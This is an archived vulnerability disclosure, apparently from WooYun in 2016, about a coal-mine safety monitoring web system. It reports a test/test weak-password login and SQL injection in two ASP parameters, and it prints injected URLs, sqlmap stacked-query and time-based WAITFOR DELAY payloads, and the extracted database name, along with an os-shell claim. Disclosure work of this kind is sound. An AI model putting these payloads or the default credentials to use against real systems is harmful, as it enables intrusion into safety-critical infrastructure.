乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-06: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
煤矿区安全
**.**.**.**/index.asp
test/test弱口令登陆,发现test账号的权限也不小,估计测试完毕没有删除或降权煤矿的分布图
某一地区的数量
警报图
矿区的作业图
此系统多个参数存在SQL注入,注入出来竟然是windows2000。。。
**.**.**.**/realtimedata/realtimedata.asp?jiedian=%E6%AC%A7%E9%87%8C%E9%95%BF%E5%9D%A1%E7%85%A4%E7%9F%BF%27**.**.**.**/mgt_show/mgt_show.asp?text=陈火根煤矿'&layer=煤矿&property=0
Parameter: #1* (URI) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: **.**.**.**:80/realtimedata/realtimedata.asp?jiedian=%E6%AC%A7%E9%87%8C%E9%95%BF%E5%9D%A1%E7%85%A4%E7%9F%BF';WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: **.**.**.**:80/realtimedata/realtimedata.asp?jiedian=%E6%AC%A7%E9%87%8C%E9%95%BF%E5%9D%A1%E7%85%A4%E7%9F%BF' WAITFOR DELAY '0:0:5'-----[21:26:09] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2000web application technology: Microsoft IIS 5.0back-end DBMS: Microsoft SQL Server 2000[21:26:09] [INFO] fetching current database[21:26:09] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[21:26:23] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[21:26:34] [INFO] adjusting time delay to 2 seconds due to good response timesmkjkcurrent database: 'mkjk'
可以执行os-shell,忒慢了
修改口令,过滤敏感字符
危害等级:高
漏洞Rank:12
确认时间:2016-01-08 17:20
CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置。
暂无